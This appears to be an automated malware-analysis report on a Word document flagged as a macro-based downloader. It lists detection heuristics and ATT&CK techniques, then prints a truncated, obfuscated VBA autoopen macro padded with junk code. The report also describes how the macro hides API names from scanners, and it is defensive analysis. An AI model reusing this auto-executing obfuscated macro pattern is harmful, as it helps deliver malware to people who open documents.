Verdict: MALICIOUS
Risk Score: 302
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains VBA macros with an autoopen subroutine, a common technique for initial execution. Critical heuristics indicate the use of WMI (Win32_Process.Create) via obfuscated API calls, suggesting an attempt to launch a malicious process. This points to a macro-based downloader designed to execute a secondary payload.
Heuristics (8)
- ClamAV: Doc.Malware.00536d-6943632-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.00536d-6943632-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION): VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 31096 bytes |

SHA-256: 301dd1cad32999e3e38d68b7c4e33a071c7cf84b9394709cbdf385cfc30af934
Preview script: first 1,000 lines of the extracted script (the preview is truncated by the analyzer; the remaining modules, including the WMI launcher flagged above, are not shown here)

```vba
Attribute VB_Name = "dGAAkcUk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "JBAQCUAG"
Attribute VB_Base = "0{3706901B-7C14-4493-BC76-D95B8185812D}{C52B5286-6452-4C8B-A5E1-72E6CA827AFA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "NAAADAk"
Attribute VB_Base = "0{86DF0F2C-B04B-4A12-99BD-FA26ADBEF63A}{ABD58C1E-B209-4851-A322-FD277A1EDD74}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "bA4AQAA"
Sub autoopen()
    If qDDU4xAZ = zCAABx Then
        Select Case GAU_UQ
        Case 313020248
            kcZwUD = Rnd(Y_AkUA + 433259910 + 631033733 / WQcoAwCk)
            SCBDAA = CByte(GxA4QAU + 540554134 + lcAAABoA + 127485574)
        Case 833807425
            O4ABCQ = S_kAZAU
            r_AUxUAx = Tan(wwAAkCBA - CSng(zXoAoB))
        End Select
    End If
    If vCUAQAA = WAXDBUUC Then
        Select Case PQUcAw
        Case 722805706
            oD4wQA = Rnd(iocQCAGA + 749868034 + 322170587 / NAAoXAA)
            iDAAADoB = CByte(J1UADAw + 366195369 + MAAZwA + 349919234)
        Case 289221047
            w1kxAQ = PDQAAAA
            TA_CAAA = Tan(J1AAA4k - CSng(uAUc1A4))
        End Select
    End If
    If dAQAkA = DAAADA Then
        Select Case BBGBkoQ
        Case 574135879
            XAAQAG1Q = Rnd(iZUUXA + 821310439 + 266249854 / EZAADAxA)
            UCBAoGDA = CByte(W1DwQQk + 284792844 + DAABUC + 885022769)
        Case 472607600
            hGAAAUG = bQQCA_Q
            aBCAAQ4k = Tan(jCQABc - CSng(ZAUAoAAB))
        End Select
    End If
    ZDD1kxw
    If TGDB_AGQ = oADAAABw Then
        Select Case MUUABB
        Case 643392688
            fAB4A1B = Rnd(kxBcAZ + 686204268 + 436790289 / hAAwZD4G)
            PAXBAQAC = CByte(s4D4QDDA + 784422509 + GGGAQQD + 329070681)
        Case 239976840
            OkCQBcB = mxkkx_
            VxDoDZXA = Tan(uxD4XAwA - CSng(oAUGGBUk))
        End Select
    End If
    If jABA_QA = UAUQAAo Then
        Select Case VBDA144G
        Case 211042643
            jAXA1Dk = Rnd(aCAxcxQ + 226736486 + 483130869 / Go_A_kX)
            WAQDxA = CByte(zZCAAAw + 478141722 + VABUX4 + 167723750)
        Case 527278098
            B1AACAcU = AXcA1c
            M4AUCAQA = Tan(fCCZcX - CSng(RQUA1ZDA))
        End Select
    End If
End Sub
Attribute VB_Name = "iDXC_1"
Function ZDD1kxw()
    On Error Resume Next
    If d4CxUAA = PAUBQAU Then
        Select Case hQBCAx
        Case 462647603
            uQwABBG = Rnd(JAGADXc + 410388081 + 544235889 / cAkwADA)
            lAQQ1BA = CByte(dBXUAQ + 257655836 + UGcZZ1 + 782678162)
        Case 75223330
            AUZBAQQ = GAAA4AcA
            qBCCAo = Tan(LAAAwUB - CSng(DcA4A1Z))
        End Select
    End If
    If KCoAAoB = wGAA1_w Then
        Select Case i_D1AA
        Case 962678222
            bk4_BAAc = Rnd(aADBAAUA + 205648002 + 142667337 / OQAo4AA)
            oAXA1xZ = CByte(o1AQAQB + 912759960 + aBABAC + 842415070)
        Case 831969025
            QcDQkABo = IoAUDwAQ
            QUAAZcxA = Tan(WX1BXQw - CSng(CGGGACA))
        End Select
    End If
    If 568 < 62696 Then
        hZQoxc = vbFalse
        If lAoAUA = oCAokcA Then
            Select Case UAZxDA
            Case 534896144
                tA4A4c = Rnd(zCCGko + 580950651 + 318338970 / WQAAoAkD)
                NAADAACD = CByte(S14oxwQ + 345214926 + vUAAkA + 314875698)
            Case 728656857
                CAZBxA = BoCZAXA
                zkGAQDXQ = Tan(nA_CwUQ - CSng(oxoGAA))
            End Select
        End If
        If TBcGUG = KAA_AQA Then
            Select Case hABAAw
            Case 392866508
                D
... (truncated)
```